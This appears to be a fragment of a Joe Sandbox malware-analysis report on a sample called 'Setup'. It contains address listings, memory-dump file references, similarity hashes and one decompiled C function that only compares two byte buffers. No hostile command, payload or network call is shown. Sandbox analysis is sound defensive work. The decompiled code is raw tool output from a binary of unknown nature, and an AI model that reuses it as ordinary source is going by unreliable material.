                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004069a5
                                                                                                                                                                                              0x00406a25
                                                                                                                                                                                              0x00406a27
                                                                                                                                                                                              0x00406a29
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406a2f
                                                                                                                                                                                              0x00406a35
                                                                                                                                                                                              0x00406ab4
                                                                                                                                                                                              0x00406ab6
                                                                                                                                                                                              0x00406ab8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406abe
                                                                                                                                                                                              0x00406ac4
                                                                                                                                                                                              0x00406b43
                                                                                                                                                                                              0x00406b45
                                                                                                                                                                                              0x00406b47
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406b55
                                                                                                                                                                                              0x00406b57
                                                                                                                                                                                              0x0040673a
                                                                                                                                                                                              0x00406742
                                                                                                                                                                                              0x00406744
                                                                                                                                                                                              0x00406320
                                                                                                                                                                                              0x00406328
                                                                                                                                                                                              0x0040632a
                                                                                                                                                                                              0x0040633b
                                                                                                                                                                                              0x0040633b
                                                                                                                                                                                              0x00405f30
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x00406751
                                                                                                                                                                                              0x00406757
                                                                                                                                                                                              0x00406b70
                                                                                                                                                                                              0x00406b70
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040675d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040675d
                                                                                                                                                                                              0x00406757
                                                                                                                                                                                              0x00406b64
                                                                                                                                                                                              0x00406b6a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406b6a
                                                                                                                                                                                              0x00406acd
                                                                                                                                                                                              0x00406acf
                                                                                                                                                                                              0x00406ae6
                                                                                                                                                                                              0x00406aee
                                                                                                                                                                                              0x00406af0
                                                                                                                                                                                              0x00406b07
                                                                                                                                                                                              0x00406b0f
                                                                                                                                                                                              0x00406b11
                                                                                                                                                                                              0x00406b28
                                                                                                                                                                                              0x00406b30
                                                                                                                                                                                              0x00406b32
                                                                                                                                                                                              0x00406b3f
                                                                                                                                                                                              0x00406b3f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406b32
                                                                                                                                                                                              0x00406b1e
                                                                                                                                                                                              0x00406b22
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406b22
                                                                                                                                                                                              0x00406afd
                                                                                                                                                                                              0x00406b01
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406b01
                                                                                                                                                                                              0x00406adc
                                                                                                                                                                                              0x00406ae0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406ae0
                                                                                                                                                                                              0x00406a3e
                                                                                                                                                                                              0x00406a40
                                                                                                                                                                                              0x00406a57
                                                                                                                                                                                              0x00406a5f
                                                                                                                                                                                              0x00406a61
                                                                                                                                                                                              0x00406a78
                                                                                                                                                                                              0x00406a80
                                                                                                                                                                                              0x00406a82
                                                                                                                                                                                              0x00406a99
                                                                                                                                                                                              0x00406aa1
                                                                                                                                                                                              0x00406aa3
                                                                                                                                                                                              0x00406ab0
                                                                                                                                                                                              0x00406ab0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406aa3
                                                                                                                                                                                              0x00406a8f
                                                                                                                                                                                              0x00406a93
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406a93
                                                                                                                                                                                              0x00406a6e
                                                                                                                                                                                              0x00406a72
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406a72
                                                                                                                                                                                              0x00406a4d
                                                                                                                                                                                              0x00406a51
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406a51
                                                                                                                                                                                              0x004069af
                                                                                                                                                                                              0x004069b1
                                                                                                                                                                                              0x004069c8
                                                                                                                                                                                              0x004069d0
                                                                                                                                                                                              0x004069d2
                                                                                                                                                                                              0x004069e9
                                                                                                                                                                                              0x004069f1
                                                                                                                                                                                              0x004069f3
                                                                                                                                                                                              0x00406a0a
                                                                                                                                                                                              0x00406a12
                                                                                                                                                                                              0x00406a14
                                                                                                                                                                                              0x00406a21
                                                                                                                                                                                              0x00406a21
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406a14
                                                                                                                                                                                              0x00406a00
                                                                                                                                                                                              0x00406a04
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406a04
                                                                                                                                                                                              0x004069df
                                                                                                                                                                                              0x004069e3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004069e3
                                                                                                                                                                                              0x004069be
                                                                                                                                                                                              0x004069c2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004069c2
                                                                                                                                                                                              0x0040691f
                                                                                                                                                                                              0x00406921
                                                                                                                                                                                              0x00406938
                                                                                                                                                                                              0x00406940
                                                                                                                                                                                              0x00406942
                                                                                                                                                                                              0x00406959
                                                                                                                                                                                              0x00406961
                                                                                                                                                                                              0x00406963
                                                                                                                                                                                              0x0040697a
                                                                                                                                                                                              0x00406982
                                                                                                                                                                                              0x00406984
                                                                                                                                                                                              0x00406991
                                                                                                                                                                                              0x00406991
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406984
                                                                                                                                                                                              0x00406970
                                                                                                                                                                                              0x00406974
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406974
                                                                                                                                                                                              0x0040694f
                                                                                                                                                                                              0x00406953
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406953
                                                                                                                                                                                              0x0040692e
                                                                                                                                                                                              0x00406932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406932
                                                                                                                                                                                              0x00406890
                                                                                                                                                                                              0x00406892
                                                                                                                                                                                              0x004068a9
                                                                                                                                                                                              0x004068b1
                                                                                                                                                                                              0x004068b3
                                                                                                                                                                                              0x004068ca
                                                                                                                                                                                              0x004068d2
                                                                                                                                                                                              0x004068d4
                                                                                                                                                                                              0x004068eb
                                                                                                                                                                                              0x004068f3
                                                                                                                                                                                              0x004068f5
                                                                                                                                                                                              0x00406902
                                                                                                                                                                                              0x00406902
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004068f5
                                                                                                                                                                                              0x004068e1
                                                                                                                                                                                              0x004068e5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004068e5
                                                                                                                                                                                              0x004068c0
                                                                                                                                                                                              0x004068c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004068c4
                                                                                                                                                                                              0x0040689f
                                                                                                                                                                                              0x004068a3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004068a3
                                                                                                                                                                                              0x00406801
                                                                                                                                                                                              0x00406803
                                                                                                                                                                                              0x0040681a
                                                                                                                                                                                              0x00406822
                                                                                                                                                                                              0x00406824
                                                                                                                                                                                              0x0040683b
                                                                                                                                                                                              0x00406843
                                                                                                                                                                                              0x00406845
                                                                                                                                                                                              0x0040685c
                                                                                                                                                                                              0x00406864
                                                                                                                                                                                              0x00406866
                                                                                                                                                                                              0x00406873
                                                                                                                                                                                              0x00406873
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406866
                                                                                                                                                                                              0x00406852
                                                                                                                                                                                              0x00406856
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406856
                                                                                                                                                                                              0x00406831
                                                                                                                                                                                              0x00406835
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406835
                                                                                                                                                                                              0x00406810
                                                                                                                                                                                              0x00406814
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040676a
                                                                                                                                                                                              0x0040676a
                                                                                                                                                                                              0x0040676e
                                                                                                                                                                                              0x00406772
                                                                                                                                                                                              0x00406774
                                                                                                                                                                                              0x0040678b
                                                                                                                                                                                              0x0040678b
                                                                                                                                                                                              0x0040678f
                                                                                                                                                                                              0x00406793
                                                                                                                                                                                              0x00406795
                                                                                                                                                                                              0x004067ac
                                                                                                                                                                                              0x004067ac
                                                                                                                                                                                              0x004067b0
                                                                                                                                                                                              0x004067b4
                                                                                                                                                                                              0x004067b6
                                                                                                                                                                                              0x004067cd
                                                                                                                                                                                              0x004067cd
                                                                                                                                                                                              0x004067d1
                                                                                                                                                                                              0x004067d5
                                                                                                                                                                                              0x004067d7
                                                                                                                                                                                              0x004067dd
                                                                                                                                                                                              0x004067e0
                                                                                                                                                                                              0x004067e4
                                                                                                                                                                                              0x004067e4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004067d7
                                                                                                                                                                                              0x004067bc
                                                                                                                                                                                              0x004067bf
                                                                                                                                                                                              0x004067c3
                                                                                                                                                                                              0x004067c7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004067c7
                                                                                                                                                                                              0x0040679b
                                                                                                                                                                                              0x0040679e
                                                                                                                                                                                              0x004067a2
                                                                                                                                                                                              0x004067a6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004067a6
                                                                                                                                                                                              0x0040677a
                                                                                                                                                                                              0x0040677d
                                                                                                                                                                                              0x00406781
                                                                                                                                                                                              0x00406785
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406785
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00405b5b
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                              • Instruction ID: aa655508b7e25f9fdf09698d2e09adffac2da104f38d9a8f59c431ed72823218
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                              • Instruction Fuzzy Hash: FAD16DB3D1A9B34AC739812D409822BEA626FD164031FC3B2DCE53F3C9D53AAD1595D4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00406342 Relevance: .4, Instructions: 378COMMONCrypto
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00406342(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}
































                                                                                                                                                                                              0x00406342
                                                                                                                                                                                              0x00406342
                                                                                                                                                                                              0x00406348
                                                                                                                                                                                              0x004063c7
                                                                                                                                                                                              0x004063c9
                                                                                                                                                                                              0x004063cb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004063d1
                                                                                                                                                                                              0x004063d7
                                                                                                                                                                                              0x00406456
                                                                                                                                                                                              0x00406458
                                                                                                                                                                                              0x0040645a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406460
                                                                                                                                                                                              0x00406466
                                                                                                                                                                                              0x004064e5
                                                                                                                                                                                              0x004064e7
                                                                                                                                                                                              0x004064e9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004064ef
                                                                                                                                                                                              0x004064f5
                                                                                                                                                                                              0x00406574
                                                                                                                                                                                              0x00406576
                                                                                                                                                                                              0x00406578
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040657e
                                                                                                                                                                                              0x00406584
                                                                                                                                                                                              0x00406603
                                                                                                                                                                                              0x00406605
                                                                                                                                                                                              0x00406607
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406613
                                                                                                                                                                                              0x00406693
                                                                                                                                                                                              0x00406695
                                                                                                                                                                                              0x00406697
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040669d
                                                                                                                                                                                              0x004066a3
                                                                                                                                                                                              0x00406722
                                                                                                                                                                                              0x00406724
                                                                                                                                                                                              0x00406726
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406734
                                                                                                                                                                                              0x00405f2e
                                                                                                                                                                                              0x00405f30
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x00406c8c
                                                                                                                                                                                              0x00406742
                                                                                                                                                                                              0x00406744
                                                                                                                                                                                              0x00406320
                                                                                                                                                                                              0x00406328
                                                                                                                                                                                              0x0040632a
                                                                                                                                                                                              0x0040633b
                                                                                                                                                                                              0x0040633b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040632a
                                                                                                                                                                                              0x00406751
                                                                                                                                                                                              0x00406757
                                                                                                                                                                                              0x00406b70
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406b70
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040675d
                                                                                                                                                                                              0x004066ac
                                                                                                                                                                                              0x004066ae
                                                                                                                                                                                              0x004066c5
                                                                                                                                                                                              0x004066cd
                                                                                                                                                                                              0x004066cf
                                                                                                                                                                                              0x004066e6
                                                                                                                                                                                              0x004066ee
                                                                                                                                                                                              0x004066f0
                                                                                                                                                                                              0x00406707
                                                                                                                                                                                              0x0040670f
                                                                                                                                                                                              0x00406711
                                                                                                                                                                                              0x0040671e
                                                                                                                                                                                              0x0040671e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406711
                                                                                                                                                                                              0x004066fd
                                                                                                                                                                                              0x00406701
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406701
                                                                                                                                                                                              0x004066dc
                                                                                                                                                                                              0x004066e0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004066e0
                                                                                                                                                                                              0x004066bb
                                                                                                                                                                                              0x004066bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004066bf
                                                                                                                                                                                              0x0040661d
                                                                                                                                                                                              0x0040661f
                                                                                                                                                                                              0x00406636
                                                                                                                                                                                              0x0040663e
                                                                                                                                                                                              0x00406640
                                                                                                                                                                                              0x00406657
                                                                                                                                                                                              0x0040665f
                                                                                                                                                                                              0x00406661
                                                                                                                                                                                              0x00406678
                                                                                                                                                                                              0x00406680
                                                                                                                                                                                              0x00406682
                                                                                                                                                                                              0x0040668f
                                                                                                                                                                                              0x0040668f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406682
                                                                                                                                                                                              0x0040666e
                                                                                                                                                                                              0x00406672
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406672
                                                                                                                                                                                              0x0040664d
                                                                                                                                                                                              0x00406651
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406651
                                                                                                                                                                                              0x0040662c
                                                                                                                                                                                              0x00406630
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406630
                                                                                                                                                                                              0x0040658d
                                                                                                                                                                                              0x0040658f
                                                                                                                                                                                              0x004065a6
                                                                                                                                                                                              0x004065ae
                                                                                                                                                                                              0x004065b0
                                                                                                                                                                                              0x004065c7
                                                                                                                                                                                              0x004065cf
                                                                                                                                                                                              0x004065d1
                                                                                                                                                                                              0x004065e8
                                                                                                                                                                                              0x004065f0
                                                                                                                                                                                              0x004065f2
                                                                                                                                                                                              0x004065ff
                                                                                                                                                                                              0x004065ff
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004065f2
                                                                                                                                                                                              0x004065de
                                                                                                                                                                                              0x004065e2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004065e2
                                                                                                                                                                                              0x004065bd
                                                                                                                                                                                              0x004065c1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004065c1
                                                                                                                                                                                              0x0040659c
